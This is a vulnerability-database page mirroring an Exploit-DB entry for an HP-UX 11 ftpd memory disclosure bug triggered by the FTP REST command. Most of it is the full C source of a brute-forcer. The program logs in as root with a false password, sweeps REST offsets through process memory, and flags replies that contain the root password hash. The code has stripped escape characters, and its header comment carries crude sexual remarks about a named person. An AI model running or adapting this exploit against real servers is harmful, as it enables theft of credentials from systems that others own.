HP-UX FTPD 1.1.214.4 – REST Command Memory Disclosure

HP-UX FTPD 1.1.214.4 – REST Command Memory Disclosure

漏洞ID 1053937 漏洞类型
发布时间 2003-06-05 更新时间 2003-06-05
图片[1]-HP-UX FTPD 1.1.214.4 – REST Command Memory Disclosure-安全小百科CVE编号 N/A
图片[2]-HP-UX FTPD 1.1.214.4 – REST Command Memory Disclosure-安全小百科CNNVD-ID N/A
漏洞平台 HP-UX CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/22733
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/7825/info

A vulnerability has been discovered in the HP-UX 11 ftpd daemon. The problem can be triggered using the FTP REST command. By specifying a specially calculated numeric argument to the command, it is possible to disclose the contents of that numeric location in process memory. This issue may be exploited to disclose the contents of sensitive files, such as /etc/passwd. 

/*
   DeepMagic - There be some Deep Magic brewin...
   http://www.deep-magic.org/
   http://www.deepmagic.us/
   http://www.deepmagic.info/
   http://www.deepmagic.name/
http://www.deepmagic.org is down atm untill opensrs/tucows
restores the domain to the proper owner.
DMhpux FTPd REST bug brute forcer
brought to you by di0aD

mad props to the media hoar phased aka Mister-X aka
MisterX aka Matt Carrol of the UK for giving
the purfekt bl0w j0b.
*/

#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <stdio.h>
#include <unistd.h>

int main (int argc, char *argv[]) {

  int sock, rc;
  long int i;
  struct sockaddr_in saddr;
  struct hostent *h;
  char buf[256];

  printf("DMhpux FTPd - REST bug brute forcern");
  printf("by di0aDn");

  if(argc < 2) {
    printf("usage: %s <host> -- simple enough?n",argv[0]);
    exit(1);
  }
  h = gethostbyname(argv[1]);
  if(h==NULL) {
    printf("%s: unknown host '%s'n",argv[0],argv[1]);
    exit(1);
  }

  saddr.sin_family = h->h_addrtype;
  memcpy((char *) &saddr.sin_addr.s_addr, h->h_addr_list[0], h->h_length);
  saddr.sin_port = htons(21);

  sock = socket(AF_INET, SOCK_STREAM, 0);
  if(sock<0) {
    perror("cannot open socket ");
    exit(1);
  }

  rc = connect(sock, (struct sockaddr *) &saddr, sizeof(saddr));
  if(rc<0) {
    perror("cannot connect ");
    exit(1);
  }

  printf("Sending false login credentialsn");
 snprintf(buf, sizeof(buf), "USER rootrn");
  printf("sending %sn", buf);
  rc = send(sock, buf, strlen(buf), 0);
  if(rc<0) {
        perror("cannot send data ");
        close(sock);
        exit(0);
  }
  dorecv(sock);
        usleep(1000);
  memset(buf, 0, sizeof(buf));
  snprintf(buf, sizeof(buf), "PASS foorn");
  printf("sending %sn", buf);
  rc = send(sock, buf, strlen(buf), 0);
usleep(1000);
  dorecv(sock);
  dorecv(sock);

  for(i=1073931080;i<=1073945000;i = i+10) {
        snprintf(buf, sizeof(buf), "REST %drn", i);
        printf("sending %sn", buf);
        send(sock, buf, strlen(buf), 0);
        dorecv(sock);
 }


return 0;

}

int dorecv(int sock) {
char buf[256];
char *check;

memset(buf, 0, sizeof(buf));
recv(sock, buf, sizeof(buf), 0);
printf("got: %sn", buf);
check = (char *)strstr(buf, "root");
if(check != NULL) {
        printf("Got root hashn");
}

}


// it takes two to tango

相关推荐: Symantec pcAnywhere Port Scan DoS Vulnerability

Symantec pcAnywhere Port Scan DoS Vulnerability 漏洞ID 1104177 漏洞类型 Failure to Handle Exceptional Conditions 发布时间 2000-04-25 更新时间 20…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享